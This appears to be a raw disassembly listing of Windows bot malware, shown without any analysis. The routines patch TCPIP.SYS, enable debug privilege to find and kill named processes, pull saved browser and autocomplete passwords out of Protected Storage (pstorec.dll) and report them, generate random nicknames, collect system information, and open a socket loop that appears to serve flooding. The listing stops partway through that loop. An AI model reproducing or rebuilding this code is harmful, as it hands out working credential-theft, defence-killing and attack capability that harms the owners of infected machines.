mov [ebp+74h+var_4], edi
loc_4092EA: ; CODE XREF: sub_408EF0+426�j
mov eax, [ebp+74h+var_4]
push edi
push [ebp+eax+74h+var_30]
push [ebp+74h+arg_0]
call sub_40ED7A
push [ebp+74h+arg_0]
mov eax, [ebp+74h+var_4]
push esi
push esi
push [ebp+eax+74h+var_64]
call sub_40EC73
add [ebp+74h+var_4], 4
add esp, 1Ch
cmp [ebp+74h+var_4], 20h
jl short loc_4092EA
loc_409318: ; CODE XREF: sub_408EF0+183�j
; sub_408EF0+1DF�j ...
push [ebp+74h+arg_0]
call sub_40E8F7
pop ecx
push edi
push ebx
push 3
push edi
push 2
push 40000000h
lea eax, [ebp+74h+var_1AC]
push eax
call dword_4190E0 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40935B
lea eax, [ebp+74h+var_9C]
push eax
lea eax, [ebp+74h+var_8C]
push eax
lea eax, [ebp+74h+var_94]
push eax
push esi
call dword_419198 ; SetFileTime
push esi
call dword_419064 ; CloseHandle
loc_40935B: ; CODE XREF: sub_408EF0+44F�j
cmp [ebp+74h+var_10], edi
jz short loc_4093A2
push [ebp+74h+var_A8]
lea eax, [ebp+74h+var_5B4]
push offset aTcpip_sysFixed ; "TCPIP.SYS fixed!, version %d."
push 400h
push eax
call sub_40DFEC
push [ebp+74h+var_A4]
lea eax, [ebp+74h+var_5B4]
push eax
push offset dword_41E1A8
push [ebp+74h+var_1B4]
call sub_4017B6
lea eax, [ebp+74h+var_5B4]
push eax
call sub_401648
add esp, 24h
loc_4093A2: ; CODE XREF: sub_408EF0+46E�j
push [ebp+74h+var_1B0]
mov dword_41E130, edi
call sub_40AADD
pop ecx
loc_4093B4: ; CODE XREF: sub_408EF0+165�j
push edi
call dword_4190D8 ; ExitThread
int 3 ; Trap to Debugger
sub_408EF0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4093BC proc near ; CODE XREF: sub_409427+5F�p
; sub_409427+1F2�p
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
lea eax, [ebp+var_4]
push eax
push 28h
call dword_4190F4 ; GetCurrentProcess
push eax
call dword_4C47C8
test eax, eax
jnz short loc_4093DB
leave
retn
; ---------------------------------------------------------------------------
loc_4093DB: ; CODE XREF: sub_4093BC+1B�j
push esi
lea eax, [ebp+var_10]
push eax
push [ebp+arg_0]
xor esi, esi
push esi
call dword_4C47AC
test eax, eax
jz short loc_409419
cmp [ebp+arg_4], esi
mov [ebp+var_14], 1
jz short loc_409402
or [ebp+var_8], 2
jmp short loc_409406
; ---------------------------------------------------------------------------
loc_409402: ; CODE XREF: sub_4093BC+3E�j
and [ebp+var_8], 0FFFFFFFDh
loc_409406: ; CODE XREF: sub_4093BC+44�j
push esi
push esi
push esi
lea eax, [ebp+var_14]
push eax
push esi
push [ebp+var_4]
call dword_4C46F8
mov esi, eax
loc_409419: ; CODE XREF: sub_4093BC+32�j
push [ebp+var_4]
call dword_419064 ; CloseHandle
mov eax, esi
pop esi
leave
retn
sub_4093BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409427 proc near ; CODE XREF: sub_40198E+181B�p
; sub_409650+66�p
var_754 = byte ptr -754h
var_354 = dword ptr -354h
var_350 = byte ptr -350h
var_234 = byte ptr -234h
var_130 = dword ptr -130h
var_12C = byte ptr -12Ch
var_128 = dword ptr -128h
var_10C = byte ptr -10Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 754h
push ebx
push esi
push edi
xor ebx, ebx
push 49h
xor eax, eax
cmp dword_4C467C, ebx
pop ecx
lea edi, [ebp+var_12C]
mov [ebp+var_130], ebx
rep stosd
mov ecx, 88h
lea edi, [ebp+var_350]
mov [ebp+var_354], ebx
rep stosd
jz loc_409620
cmp dword_4C46DC, ebx
jz loc_409620
cmp dword_4C4634, ebx
jz loc_409620
push 1
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_4093BC
pop ecx
pop ecx
push ebx
push 0Fh
call dword_4C467C
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_8], edi
jz loc_409613
lea eax, [ebp+var_130]
push eax
push edi
mov [ebp+var_130], 128h
call dword_4C46DC
test eax, eax
mov esi, dword_419064
jz loc_40960E
lea eax, [ebp+var_130]
push eax
push edi
call dword_4C4634
test eax, eax
jz loc_40960E
mov edi, dword_419074
mov ebx, 1F0FFFh
loc_4094EB: ; CODE XREF: sub_409427+1DF�j
xor eax, eax
cmp [ebp+arg_10], eax
jz short loc_40954F
mov [ebp+var_4], eax
loc_4094F5: ; CODE XREF: sub_409427+F0�j
mov eax, [ebp+var_4]
push off_41EE1C[eax]
lea eax, [ebp+var_10C]
push eax
call dword_4190A4 ; lstrcmpi
test eax, eax
jz short loc_40951E
add [ebp+var_4], 4
cmp [ebp+var_4], 0Ch
jb short loc_4094F5
jmp loc_4095F4
; ---------------------------------------------------------------------------
loc_40951E: ; CODE XREF: sub_409427+E6�j
push [ebp+var_128]
push 0
push ebx
call edi ; OpenProcess
test eax, eax
mov [ebp+var_4], eax
jz loc_4095F4
push 0
push eax
call dword_419070 ; TerminateProcess
test eax, eax
jnz loc_4095F4
loc_409545: ; CODE XREF: sub_409427+1B3�j
push [ebp+var_4]
call esi ; CloseHandle
jmp loc_4095F4
; ---------------------------------------------------------------------------
loc_40954F: ; CODE XREF: sub_409427+C9�j
cmp [ebp+arg_C], eax
jnz loc_4095DF
cmp [ebp+arg_4], eax
jz loc_4095F4
push [ebp+var_128]
push 8
call dword_4C467C
cmp [ebp+arg_14], 0
mov [ebp+var_4], eax
mov [ebp+var_354], 224h
jz short loc_4095A1
lea ecx, [ebp+var_354]
push ecx
push eax
call sub_40D616 ; Module32First
test eax, eax
push [ebp+var_128]
jz short loc_4095A7
lea eax, [ebp+var_234]
jmp short loc_4095AD
; ---------------------------------------------------------------------------
loc_4095A1: ; CODE XREF: sub_409427+159�j
push [ebp+var_128]
loc_4095A7: ; CODE XREF: sub_409427+170�j
lea eax, [ebp+var_10C]
loc_4095AD: ; CODE XREF: sub_409427+178�j
push eax
lea eax, [ebp+var_754]
push offset aSD ; " %s (%d)"
push eax
call sub_40D6BB
add esp, 10h
push [ebp+arg_8]
lea eax, [ebp+var_754]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4017B6
add esp, 10h
jmp loc_409545
; ---------------------------------------------------------------------------
loc_4095DF: ; CODE XREF: sub_409427+12B�j
push [ebp+arg_C]
lea eax, [ebp+var_10C]
push eax
call sub_40D720
test eax, eax
pop ecx
pop ecx
jz short loc_409627
loc_4095F4: ; CODE XREF: sub_409427+F2�j
; sub_409427+107�j ...
lea eax, [ebp+var_130]
push eax
push [ebp+var_8]
call dword_4C4634
test eax, eax
jnz loc_4094EB
xor ebx, ebx
loc_40960E: ; CODE XREF: sub_409427+9D�j
; sub_409427+B3�j
push [ebp+var_8]
call esi ; CloseHandle
loc_409613: ; CODE XREF: sub_409427+77�j
push ebx
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_4093BC
pop ecx
pop ecx
loc_409620: ; CODE XREF: sub_409427+3A�j
; sub_409427+46�j ...
xor eax, eax
loc_409622: ; CODE XREF: sub_409427+227�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_409627: ; CODE XREF: sub_409427+1CB�j
push [ebp+var_128]
push 0
push ebx
call edi ; OpenProcess
push [ebp+var_8]
mov edi, eax
call esi ; CloseHandle
push 0
push edi
call dword_419070 ; TerminateProcess
test eax, eax
jnz short loc_40964B
push edi
call esi ; CloseHandle
jmp short loc_409620
; ---------------------------------------------------------------------------
loc_40964B: ; CODE XREF: sub_409427+21D�j
xor eax, eax
inc eax
jmp short loc_409622
sub_409427 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_409650 proc near ; DATA XREF: sub_40198E+1628�o
var_498 = byte ptr -498h
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 498h
mov eax, [ebp+74h+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_98]
rep movsd
mov dword ptr [eax+94h], 1
lea eax, [ebp+74h+var_498]
push offset aListingPs ; "Listing ps:"
push eax
call sub_40D6BB
xor esi, esi
cmp [ebp+74h+var_8], esi
pop ecx
pop ecx
jnz short loc_4096A7
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_498]
push eax
lea eax, [ebp+74h+var_94]
push eax
push [ebp+74h+var_98]
call sub_4017B6
add esp, 10h
loc_4096A7: ; CODE XREF: sub_409650+3C�j
push [ebp+74h+var_10]
lea eax, [ebp+74h+var_94]
push esi
push esi
push [ebp+74h+var_C]
push eax
push [ebp+74h+var_98]
call sub_409427
add esp, 18h
test eax, eax
lea eax, [ebp+74h+var_498]
jnz short loc_4096CF
push offset aPsListComplete ; "Ps list completed."
jmp short loc_4096D4
; ---------------------------------------------------------------------------
loc_4096CF: ; CODE XREF: sub_409650+76�j
push offset aPsListFailed_ ; "Ps list failed."
loc_4096D4: ; CODE XREF: sub_409650+7D�j
push eax
call sub_40D6BB
cmp [ebp+74h+var_8], esi
pop ecx
pop ecx
jnz short loc_4096FA
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_498]
push eax
lea eax, [ebp+74h+var_94]
push eax
push [ebp+74h+var_98]
call sub_4017B6
add esp, 10h
loc_4096FA: ; CODE XREF: sub_409650+8F�j
lea eax, [ebp+74h+var_498]
push eax
call sub_401648
push [ebp+74h+var_14]
call sub_40AADD
pop ecx
pop ecx
push esi
call dword_4190D8 ; ExitThread
int 3 ; Trap to Debugger
sub_409650 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_409718 proc near ; CODE XREF: sub_40198E+1887�p
; sub_40A920+57�p
arg_0 = dword ptr 4
push esi
push edi
push [esp+8+arg_0]
xor edi, edi
push 0
push 1F0FFFh
inc edi
call dword_419074 ; OpenProcess
mov esi, eax
test esi, esi
jz short loc_40974A
push 0
push esi
call dword_419070 ; TerminateProcess
test eax, eax
jnz short loc_40974A
push esi
xor edi, edi
call dword_419064 ; CloseHandle
loc_40974A: ; CODE XREF: sub_409718+1A�j
; sub_409718+27�j
mov eax, edi
pop edi
pop esi
retn
sub_409718 endp
; ---------------------------------------------------------------------------
loc_40974F: ; CODE XREF: .text:00417FC0�j
; .text:00417FC8�j ...
mov eax, [ecx]
test eax, eax
jz short locret_40975B
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
locret_40975B: ; CODE XREF: .text:00409753�j
retn
; =============== S U B R O U T I N E =======================================
sub_40975C proc near ; CODE XREF: .text:004097C6�p
; .text:004097E3�p ...
push esi
mov esi, ecx
mov eax, [esi]
test eax, eax
jz short loc_40976B
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_40976B: ; CODE XREF: sub_40975C+7�j
and dword ptr [esi], 0
mov eax, esi
pop esi
retn
sub_40975C endp
; ---------------------------------------------------------------------------
loc_409772: ; DATA XREF: sub_40198E+1401�o
mov eax, offset loc_417FDD
call sub_40F234
mov eax, 11A0h
call sub_40D9A0
push ebx
push esi
mov esi, [ebp+8]
push edi
push 21h
pop ecx
lea edi, [ebp-3C4h]
push offset aPstorec_dll ; "pstorec.dll"
rep movsd
call dword_4190F0 ; LoadLibraryA
xor ebx, ebx
cmp eax, ebx
jz loc_409C31
push offset aPstorecreatein ; "PStoreCreateInstance"
push eax
call dword_4190F8 ; GetProcAddress
mov esi, eax
mov [ebp+8], ebx
push ebx
push ebx
push ebx
lea ecx, [ebp+8]
mov [ebp-4], ebx
call sub_40975C
push eax
call esi ; CloseHandle
cmp eax, ebx
jl loc_409C20
mov [ebp-14h], ebx
mov esi, [ebp+8]
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 1
call sub_40975C
mov ecx, [esi]
push eax
push ebx
push ebx
push esi
call dword ptr [ecx+38h]
cmp eax, ebx
jl loc_409C10
loc_4097F9: ; CODE XREF: .text:00409BFF�j
; .text:00409C0B�j
mov eax, [ebp-14h]
mov ecx, [eax]
push ebx
lea edx, [ebp-34h]
push edx
push 1
push eax
call dword ptr [ecx+0Ch]
test eax, eax
jnz loc_409C10
sub esp, 10h
mov edi, esp
lea esi, [ebp-34h]
movsd
movsd
movsd
lea eax, [ebp-78h]
push offset asc_41B3C0 ; "%x"
push eax
movsd
call dword_4191E0 ; wsprintfA
add esp, 18h
mov [ebp-18h], ebx
mov esi, [ebp+8]
lea ecx, [ebp-18h]
mov byte ptr [ebp-4], 2
call sub_40975C
mov ecx, [esi]
push eax
push ebx
lea eax, [ebp-34h]
push eax
push ebx
push esi
call dword ptr [ecx+3Ch]
loc_40984E: ; CODE XREF: .text:00409BE5�j
; .text:00409BF1�j
mov eax, [ebp-18h]
mov ecx, [eax]
push ebx
lea edx, [ebp-44h]
push edx
push 1
push eax
call dword ptr [ecx+0Ch]
test eax, eax
jnz loc_409BF6
mov [ebp-1Ch], ebx
mov esi, [ebp+8]
lea ecx, [ebp-1Ch]
mov byte ptr [ebp-4], 3
call sub_40975C
mov ecx, [esi]
push eax
push ebx
lea eax, [ebp-44h]
push eax
lea eax, [ebp-34h]
push eax
push ebx
push esi
call dword ptr [ecx+54h]
loc_409889: ; CODE XREF: .text:00409BD7�j
mov eax, [ebp-1Ch]
mov ecx, [eax]
push ebx
lea edx, [ebp-20h]
push edx
push 1
push eax
call dword ptr [ecx+0Ch]
test eax, eax
jnz loc_409BDC
push dword ptr [ebp-20h]
mov edi, dword_4191E0
lea eax, [ebp-5C4h]
push offset aWs ; "%ws"
push eax
call edi ; wsprintfA
mov eax, [ebp+8]
add esp, 0Ch
push ebx
push ebx
lea edx, [ebp-10h]
push edx
lea edx, [ebp-24h]
push edx
push dword ptr [ebp-20h]
lea edx, [ebp-44h]
push edx
lea edx, [ebp-34h]
push edx
push ebx
mov [ebp-24h], ebx
mov [ebp-10h], ebx
mov ecx, [eax]
push eax
call dword ptr [ecx+44h]
push dword ptr [ebp-10h]
call dword_419148 ; lstrlen
mov esi, [ebp-24h]
lea eax, [esi-1]
test eax, eax
jz short loc_409926
xor edx, edx
xor ecx, ecx
cmp esi, ebx
jbe short loc_40991D
loc_4098FB: ; CODE XREF: .text:0040991B�j
mov eax, [ebp-10h]
mov al, [ecx+eax]
cmp al, bl
jnz short loc_40990F
mov byte ptr [ebp+edx-340h], 2Ch
jmp short loc_409916
; ---------------------------------------------------------------------------
loc_40990F: ; CODE XREF: .text:00409903�j
mov [ebp+edx-340h], al
loc_409916: ; CODE XREF: .text:0040990D�j
inc edx
inc ecx
inc ecx
cmp ecx, esi
jb short loc_4098FB
loc_40991D: ; CODE XREF: .text:004098F9�j
mov [ebp+edx-341h], bl
jmp short loc_40993A
; ---------------------------------------------------------------------------
loc_409926: ; CODE XREF: .text:004098F1�j
push dword ptr [ebp-10h]
lea eax, [ebp-340h]
push offset aS_0 ; "%s"
push eax
call edi ; wsprintfA
add esp, 0Ch
loc_40993A: ; CODE XREF: .text:00409924�j
mov esi, dword_419144
mov edi, offset word_41994E
push edi
lea eax, [ebp-11ACh]
push eax
call esi ; lstrcpy
push edi
lea eax, [ebp-0BC4h]
push eax
call esi ; lstrcpy
push offset a5e7e8100 ; "5e7e8100"
lea eax, [ebp-78h]
push eax
call dword_4190C8 ; lstrcmp
test eax, eax
jnz loc_409A3A
push edi
lea eax, [ebp-140h]
push eax
call esi ; lstrcpy
lea eax, [ebp-340h]
push offset asc_41A1DC ; ":"
push eax
call sub_40D810
test eax, eax
pop ecx
pop ecx
jz short loc_4099C4
lea eax, [ebp-340h]
push offset asc_41A1DC ; ":"
push eax
call sub_40D810
pop ecx
pop ecx
inc eax
push eax
lea eax, [ebp-140h]
push eax
call esi ; lstrcpy
lea eax, [ebp-340h]
push offset asc_41A1DC ; ":"
push eax
call sub_40D810
pop ecx
pop ecx
mov [eax], bl
loc_4099C4: ; CODE XREF: .text:0040998F�j
lea eax, [ebp-340h]
push edi
push eax
call sub_40D720
test eax, eax
pop ecx
pop ecx
jz short loc_409A13
lea eax, [ebp-140h]
push edi
push eax
call sub_40D720
test eax, eax
pop ecx
pop ecx
jz short loc_409A13
lea eax, [ebp-140h]
push eax
lea eax, [ebp-340h]
push eax
lea eax, [ebp-5C4h]
push eax
lea eax, [ebp-9C4h]
push offset aSSS_1 ; "%s %s:%s"
push eax
call sub_40D6BB
add esp, 14h
loc_409A13: ; CODE XREF: .text:004099D5�j
; .text:004099E8�j
push ebx
lea eax, [ebp-9C4h]
push eax
push offset dword_41E1A8
push dword ptr [ebp-3C4h]
call sub_4017B6
lea eax, [ebp-9C4h]
push eax
call sub_401648
add esp, 14h
loc_409A3A: ; CODE XREF: .text:0040996A�j
push offset aE161255a ; "e161255a"
lea eax, [ebp-78h]
push eax
call dword_4190C8 ; lstrcmp
test eax, eax
jnz loc_409BA8
lea eax, [ebp-5C4h]
push offset aStringindex ; "StringIndex"
push eax
call sub_40D810
test eax, eax
pop ecx
pop ecx
jnz loc_409BA8
lea eax, [ebp-5C4h]
push offset aString ; ":String"
push eax
call sub_40D810
test eax, eax
pop ecx
pop ecx
jz short loc_409A98
lea eax, [ebp-5C4h]
push offset aString ; ":String"
push eax
call sub_40D810
pop ecx
pop ecx
mov [eax], bl
loc_409A98: ; CODE XREF: .text:00409A81�j
push 8
lea eax, [ebp-5C4h]
push eax
lea eax, [ebp-140h]
push eax
call dword_419140 ; lstrcpyn
lea eax, [ebp-140h]
push offset aHttp_0 ; "http:/"
push eax
call sub_40D810
test eax, eax
pop ecx
pop ecx
jnz short loc_409AE0
lea eax, [ebp-140h]
push offset aHttps ; "https:/"
push eax
call sub_40D810
test eax, eax
pop ecx
pop ecx
jz loc_409BA8
loc_409AE0: ; CODE XREF: .text:00409AC3�j
push edi
lea eax, [ebp-140h]
push eax
call esi ; lstrcpy
mov edi, offset asc_41B370 ; ","
lea eax, [ebp-340h]
push edi
push eax
call sub_40D810
test eax, eax
pop ecx
pop ecx
jz short loc_409B2D
lea eax, [ebp-340h]
push edi
push eax
call sub_40D810
pop ecx
pop ecx
inc eax
push eax
lea eax, [ebp-140h]
push eax
call esi ; lstrcpy
lea eax, [ebp-340h]
push edi
push eax
call sub_40D810
pop ecx
pop ecx
mov [eax], bl
loc_409B2D: ; CODE XREF: .text:00409B00�j
mov esi, offset word_41994E
lea eax, [ebp-340h]
push esi
push eax
call sub_40D720
test eax, eax
pop ecx
pop ecx
jz short loc_409B81
lea eax, [ebp-140h]
push esi
push eax
call sub_40D720
test eax, eax
pop ecx
pop ecx
jz short loc_409B81
lea eax, [ebp-140h]
push eax
lea eax, [ebp-340h]
push eax
lea eax, [ebp-5C4h]
push eax
lea eax, [ebp-9C4h]
push offset aSSS_1 ; "%s %s:%s"
push eax
call sub_40D6BB
add esp, 14h
loc_409B81: ; CODE XREF: .text:00409B43�j
; .text:00409B56�j
push ebx
lea eax, [ebp-9C4h]
push eax
push offset dword_41E1A8
push dword ptr [ebp-3C4h]
call sub_4017B6
lea eax, [ebp-9C4h]
push eax
call sub_401648
add esp, 14h
loc_409BA8: ; CODE XREF: .text:00409A4B�j
; .text:00409A66�j ...
mov esi, 200h
push esi
lea eax, [ebp-5C4h]
push ebx
push eax
call sub_40D7B0
push esi
lea eax, [ebp-340h]
push ebx
push eax
call sub_40D7B0
add esp, 18h
push 3E8h
call dword_419060 ; Sleep
jmp loc_409889
; ---------------------------------------------------------------------------
loc_409BDC: ; CODE XREF: .text:0040989B�j
mov eax, [ebp-1Ch]
cmp eax, ebx
mov byte ptr [ebp-4], 2
jz loc_40984E
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
jmp loc_40984E
; ---------------------------------------------------------------------------
loc_409BF6: ; CODE XREF: .text:00409860�j
mov eax, [ebp-18h]
cmp eax, ebx
mov byte ptr [ebp-4], 1
jz loc_4097F9
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
jmp loc_4097F9
; ---------------------------------------------------------------------------
loc_409C10: ; CODE XREF: .text:004097F3�j
; .text:0040980B�j
mov eax, [ebp-14h]
cmp eax, ebx
mov [ebp-4], bl
jz short loc_409C20
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_409C20: ; CODE XREF: .text:004097D0�j
; .text:00409C18�j
mov eax, [ebp+8]
or dword ptr [ebp-4], 0FFFFFFFFh
cmp eax, ebx
jz short loc_409C31
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_409C31: ; CODE XREF: .text:004097A6�j
; .text:00409C29�j
mov ecx, [ebp-0Ch]
pop edi
pop esi
xor eax, eax
mov large fs:0, ecx
pop ebx
leave
retn 4
; =============== S U B R O U T I N E =======================================
sub_409C44 proc near ; CODE XREF: sub_40198E+2320�p
; sub_409C91+4A�p
; DATA XREF: ...
arg_0 = dword ptr 4
push ebx
push esi
push edi
call dword_4190A8 ; GetTickCount
push eax
call sub_40E043
pop ecx
call sub_40E04D
push 3
cdq
pop ecx
idiv ecx
mov ebx, [esp+0Ch+arg_0]
xor edi, edi
mov esi, edx
add esi, dword_41E13C
test esi, esi
jle short loc_409C87
loc_409C71: ; CODE XREF: sub_409C44+41�j
call sub_40E04D
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [edi+ebx], dl
inc edi
cmp edi, esi
jl short loc_409C71
loc_409C87: ; CODE XREF: sub_409C44+2B�j
and byte ptr [edi+ebx], 0
pop edi
pop esi
mov eax, ebx
pop ebx
retn
sub_409C44 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C91 proc near ; CODE XREF: sub_40198E+2E2�p
; sub_40198E+B06�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
push edi
xor edi, edi
xor esi, esi
loc_409C9A: ; CODE XREF: sub_409C91+40�j
cmp [ebp+arg_C], 0
jz short loc_409CB8
lea eax, dword_41EE28[esi]
push eax
push [ebp+arg_C]
call sub_40D720
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_409CC6
; ---------------------------------------------------------------------------
loc_409CB8: ; CODE XREF: sub_409C91+D�j
mov ecx, dword_41EE34[esi]
xor eax, eax
cmp ecx, [ebp+arg_4]
setz al
loc_409CC6: ; CODE XREF: sub_409C91+25�j
test eax, eax
jnz short loc_409CD5
add esi, 14h
inc edi
cmp esi, 28h
jb short loc_409C9A
jmp short loc_409CE3
; ---------------------------------------------------------------------------
loc_409CD5: ; CODE XREF: sub_409C91+37�j
push [ebp+arg_0]
lea eax, [edi+edi*4]
call off_41EE38[eax*4]
pop ecx
loc_409CE3: ; CODE XREF: sub_409C91+42�j
mov eax, [ebp+arg_0]
pop edi
pop esi
pop ebp
retn
sub_409C91 endp
; ---------------------------------------------------------------------------
push ebp
lea ebp, [esp-74h]
sub esp, 0B8h
push ebx
push esi
push edi
lea eax, [ebp-44h]
push eax
mov edi, offset word_41994E
mov dword ptr [ebp-44h], 94h
call dword_419138 ; GetVersionExA
cmp dword ptr [ebp-40h], 4
push 0Ah
pop ebx
jnz short loc_409D4E
cmp dword ptr [ebp-3Ch], 0
jnz short loc_409D35
cmp dword ptr [ebp-34h], 1
jnz short loc_409D28
mov edi, offset dword_41B454
loc_409D28: ; CODE XREF: .text:00409D21�j
cmp dword ptr [ebp-34h], 2
jnz short loc_409D7E
mov edi, offset dword_41B450
jmp short loc_409D7E
; ---------------------------------------------------------------------------
loc_409D35: ; CODE XREF: .text:00409D1B�j
cmp [ebp-3Ch], ebx
jnz short loc_409D41
mov edi, offset dword_41B44C
jmp short loc_409D7E
; ---------------------------------------------------------------------------
loc_409D41: ; CODE XREF: .text:00409D38�j
cmp dword ptr [ebp-3Ch], 5Ah
jnz short loc_409D79
mov edi, offset dword_41B448
jmp short loc_409D7E
; ---------------------------------------------------------------------------
loc_409D4E: ; CODE XREF: .text:00409D15�j
cmp dword ptr [ebp-40h], 5
jnz short loc_409D79
cmp dword ptr [ebp-3Ch], 0
jnz short loc_409D61
mov edi, offset dword_41B444
jmp short loc_409D7E
; ---------------------------------------------------------------------------
loc_409D61: ; CODE XREF: .text:00409D58�j
cmp dword ptr [ebp-3Ch], 1
jnz short loc_409D6E
mov edi, offset dword_41B440
jmp short loc_409D7E
; ---------------------------------------------------------------------------
loc_409D6E: ; CODE XREF: .text:00409D65�j
cmp dword ptr [ebp-3Ch], 2
mov edi, offset dword_41B43C
jz short loc_409D7E
loc_409D79: ; CODE XREF: .text:00409D45�j
; .text:00409D52�j
mov edi, offset dword_41B438
loc_409D7E: ; CODE XREF: .text:00409D2C�j
; .text:00409D33�j ...
lea eax, [ebp-30h]
push offset dword_419388
push eax
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_409D99
mov esi, offset dword_41B434
jmp short loc_409E08
; ---------------------------------------------------------------------------
loc_409D99: ; CODE XREF: .text:00409D90�j
lea eax, [ebp-30h]
push offset dword_41B430
push eax
call sub_40D810
test eax, eax
pop ecx
pop ecx
jz short loc_409DB4
mov esi, offset dword_41B42C
jmp short loc_409E08
; ---------------------------------------------------------------------------
loc_409DB4: ; CODE XREF: .text:00409DAB�j
lea eax, [ebp-30h]
push offset a2 ; "2"
push eax
call sub_40D810
test eax, eax
pop ecx
pop ecx
jz short loc_409DCF
mov esi, offset dword_41B428
jmp short loc_409E08
; ---------------------------------------------------------------------------
loc_409DCF: ; CODE XREF: .text:00409DC6�j
lea eax, [ebp-30h]
push offset dword_41B424
push eax
call sub_40D810
test eax, eax
pop ecx
pop ecx
jz short loc_409DEA
mov esi, offset dword_41B420
jmp short loc_409E08
; ---------------------------------------------------------------------------
loc_409DEA: ; CODE XREF: .text:00409DE1�j
lea eax, [ebp-30h]
push offset dword_41B41C
push eax
call sub_40D810
test eax, eax
pop ecx
pop ecx
mov esi, offset dword_41B418
jnz short loc_409E08
mov esi, offset off_41B414
loc_409E08: ; CODE XREF: .text:00409D97�j
; .text:00409DB2�j ...
or dword ptr [ebp+70h], 0FFFFFFFFh
or dword ptr [ebp+6Ch], 0FFFFFFFFh
or dword ptr [ebp+68h], 0FFFFFFFFh
lea eax, [ebp+68h]
push eax
lea eax, [ebp+6Ch]
push eax
lea eax, [ebp+70h]
push eax
push offset aDdDhDm ; "%dd %dh %dm"
push 0
call sub_40A5BD
pop ecx
push eax
call sub_40DCA4
mov eax, [ebp+70h]
add esp, 14h
cmp eax, ebx
jge short loc_409E52
push eax
push offset a0D ; "0%d"
lea eax, [ebp+5Ch]
push ebx
push eax
call sub_40DFEC
add esp, 10h
jmp short loc_409E76
; ---------------------------------------------------------------------------
loc_409E52: ; CODE XREF: .text:00409E3B�j
cmp eax, 64h
jge short loc_409E64
push ebx
lea ecx, [ebp+5Ch]
push ecx
push eax
call sub_417EC8
jmp short loc_409E73
; ---------------------------------------------------------------------------
loc_409E64: ; CODE XREF: .text:00409E55�j
push offset a99 ; "99"
lea eax, [ebp+5Ch]
push ebx
push eax
call sub_40DFEC
loc_409E73: ; CODE XREF: .text:00409E62�j
add esp, 0Ch
loc_409E76: ; CODE XREF: .text:00409E50�j
call dword_4190A8 ; GetTickCount
push eax
call sub_40E043
pop ecx
push ebx
lea eax, [ebp+50h]
push eax
push 7
push 800h
call dword_41914C ; GetLocaleInfoA
lea eax, [ebp+5Ch]
push eax
push esi
push edi
mov edi, [ebp+7Ch]
lea eax, [ebp+50h]
push eax
push offset aSSSS ; "%s|%s|%s|%s|"
push 1Ch
push edi
call sub_40DFEC
xor esi, esi
add esp, 1Ch
cmp dword_41E13C, esi
jle short loc_409EE1
loc_409EBC: ; CODE XREF: .text:00409EDF�j
call sub_40E04D
cdq
mov ecx, ebx
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_40DFEC
add esp, 14h
inc esi
cmp esi, dword_41E13C
jl short loc_409EBC
loc_409EE1: ; CODE XREF: .text:00409EBA�j
mov eax, edi
pop edi
pop esi
pop ebx
add ebp, 74h
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409EEB proc near ; CODE XREF: sub_409FA5+27�p
var_654 = dword ptr -654h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 654h
push 10h
lea eax, [ebp+var_14]
push 0
push eax
call sub_40D7B0
add esp, 0Ch
push [ebp+arg_4]
mov [ebp+var_14], 2
call dword_4C47DC
mov [ebp+var_12], ax
mov eax, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_8]
test eax, eax
mov [ebp+var_4], 1
jle short loc_409FA1
push esi
push edi
mov [ebp+arg_0], eax
mov edi, 190h
loc_409F35: ; CODE XREF: sub_409EEB+B2�j
xor esi, esi
loc_409F37: ; CODE XREF: sub_409EEB+77�j
push 0
push 1
push 2
call dword_419238 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+esi*4+var_654], eax
jz short loc_409F5F
lea ecx, [ebp+var_4]
push ecx
push 8004667Eh
push eax
